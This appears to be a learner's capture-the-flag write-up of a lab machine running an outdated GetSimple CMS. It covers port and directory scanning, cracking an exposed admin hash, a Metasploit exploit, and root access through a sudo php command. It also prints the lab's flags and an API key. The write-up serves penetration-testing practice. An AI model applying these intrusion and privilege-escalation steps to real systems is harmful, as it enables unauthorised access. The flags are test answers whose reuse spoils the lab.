Knowledge Check
TARGET IP: 10.129.42.249
OPSINT (Check Browser)
Start by checking out the IP on a browser
Looks like the URL runs off of GetSimple CMS.
It looks like it is the default page for the program.
A quick google search shows default credentials.
newuser:password
siteadmin:password213
None of these worked.
However, I did find a possible workaround if I can get access to the system:
Edit file:
data/users/youuser.xmlChange field:
<PWD>YOUR_ENCRYPTED_PW</PWD>to<PWD>011c945f30ce2cbafc452f39840f025693339c42</PWD>Save
New password should be
1111
Checked the source code for anything that sticks out. Didn't find anything to note.
Checked the /robots.txt directory and discovered another link to a /admin page.
Checked out the /admin page and found a login page for the gettingstarted app.
I tried admin:password for the username:password. It did not work. I got a Error message:
Error: Login failed. Please double check your Username and Password
Run nmap on IP and see what ports are open. Start with basic nmap scan and refine:
nmap --open -Pn [TARGET_IP]
I'm using the -Pn option because it looks like it is blocking my pings. This took a while.
Nothing popped up. So I ran the nmap again basic and it seemed to work this time.
nmap --open [TARGET_IP]
Port 22 and 80 were both open which makes sense for a webserver. I went ahead and ran a basic nmap scan on all ports to see if anything else was open:
nmap --open -p- [TARGET_IP]
Nothing was popping up because it was saying it was blocking my ping probes. Might want to retry if I hit a roadblock somewhere else.
I went ahead and ran a more detailed scan on ports 22 and 80:
nmap -sV -sC -p 22,80 [TARGET_IP]
Output:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA) | 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA) |_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/admin/ |_http-title: Welcome to GetSimple! - gettingstarted |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
It looks like the server is Linux.
SSH Version: penSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
The host keys are listed above.
Port 80 is running Apache Version: Apache httpd 2.4.41 ((Ubuntu))
Ran gobuster on TARGET_IP and came up with some more extensions:
/.hta (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278]Can't get access to
I checked the cookies on the request:
GS_ADMIN_USERNAME:admin
4bc774744b09f4bb3746b641176918d9f52ef9b9:"93faf1706c6b62a18553fe3cdf4e4c1015c73760"
I tried MD5 and base64, UTF-8, and ISO-8859-1 (Found it in the header). no go...
Need to look at other methods to decrypt and then use Burpsuite to change cookie and try to get access
/admin (Status: 301) [Size: 314] [--> http://10.129.42.249/admin/]Sign in page
/backups (Status: 301) [Size: 316] [--> http://10.129.42.249/backups/]Empty
But I can create a zip file of a backup of the system. I might be able to dig through the zip file and find something in here that would help.
/home/user/Desktop/_var_www_html_backups_zip_2023-02-01-0300_41_archive.zip
/.htaccess (Status: 403) [Size: 278]Can't get access
/data (Status: 301) [Size: 313] [--> http://10.129.42.249/data/]Look into this extension for possibly changing the password above.
Checked out
users/adminand found out one of the usernames isadminLooks like the password is
encryptedbut will look into decrypting is.Doesn'tlook hashed.d033e22ae348aeb5660fc2140aec35850c4da997I used Crackstation to look it up.
Holy cow! It's an MD5 hash that translates to... wait for it...
adminI now have access to the admin account with
admin:admincredentialsEmail is admin@gettingstarted.com
I have admin access to the account. From here it looks like I can create a page. I can access the file system in /data/pages for the pages. I should be able to gain access to the system from here by adding a new file
On the data/other/authorization.xml I found an API Key:
4f399dc72ff8e619e327800f851e9986
On
/data/other/logs/I found a login of all failed login attempts including my own.On the
/data/cache/I found .txt file specifying that we are running on an old version. Confirmed that this is the GetSimple Version which is 3.3.15. Need to check for exploits.{"status":"0","latest":"3.3.16","your_version":"3.3.15","message":"You have an old version - please upgrade"}h
/index.php (Status: 200) [Size: 5485]Home
/plugins (Status: 301) [Size: 316] [--> http://10.129.42.249/plugins/]There are some .php files in here but can't see the contents of them
/robots.txt (Status: 200) [Size: 32]Found /admin in here
/server-status (Status: 403) [Size: 278]Can't get access to
/sitemap.xml (Status: 200) [Size: 431]Looks like nothing important?
/theme (Status: 301) [Size: 314] [--> http://10.129.42.249/theme/]Looks to be mainly styles files
I checked Metasploit and it looks like there are two exploits available for GetSimple:
The first one didn't work with the credentials I provided. However the second exploit worked as it will work on the version of GetSimple that the website is running. Which is outdated.
I had to redirect to the /home/mrb3n directory but found the user.txt file with the flag:
7002d65b149b0a4d19132a66feed21d8
I then used the
shellcommand to drop into a shell and slightly better terminal.I ran the following to get a better console:
python3 -c 'import pty; pty.spawn("/bin/bash")'
I ran sudo -l:
(ALL : ALL) NOPASSWD: /usr/bin/phpI checked gtfobins for possible root escalation:
https://gtfobins.github.io/gtfobins/php/#sudo
CMD="/bin/sh" sudo php -r "system('$CMD');"
Rand the above and got root priveleges.
Went to the /root/root.txt and grabbed the flag with a minute left on the machine:
f1fba6e9f71efb2630e6e34da6387842
Last updated